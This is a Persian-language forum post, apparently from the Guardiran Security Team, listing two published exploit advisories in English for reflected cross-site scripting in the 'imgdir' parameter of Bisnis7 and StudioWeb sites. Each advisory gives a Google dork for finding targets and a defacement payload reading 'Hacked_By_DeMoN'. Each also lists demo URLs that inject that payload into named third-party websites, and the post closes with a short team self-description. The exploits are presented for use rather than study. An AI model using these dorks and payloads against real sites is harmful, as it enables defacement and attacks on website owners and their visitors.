  24. ثبت اکسپلویت (bisnis7/Cross Site Scripting(XSS به نام تیم امنیتی گارد ایران(Guardiran Security Team). https://cxsecurity.com/issue/WLB-2015110116 http://iedb.ir/exploits-4130.html ######################################################## # Exploit Title: bisnis7/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by Bisnis7 " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://bisnis7.com.webstatsdomain.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://www.rumahguidXes.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.geestringXs.net/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://dumbwaiterinXdonesia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  25. ثبت اکسپلویت (StudioWeb/Cross Site Scripting(XSS به نام تیم امنیتی گارد ایران(Guardiran Security Team). https://cxsecurity.com/issue/WLB-2015110115 http://iedb.ir/exploits-4129.html ######################################################## # (Exploit Title: StudioWeb/Cross Site Scripting(XSS ######################################################## # Google Dork: inurl:"poto" intext:"powered by StudioWeb " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://www.studioweb.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://assalamherbal222X.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://susu-bubuk.comX/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://bestbeachbungXalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.ptskk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.goholidayX-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalboXhemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################

درباره ی ما

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.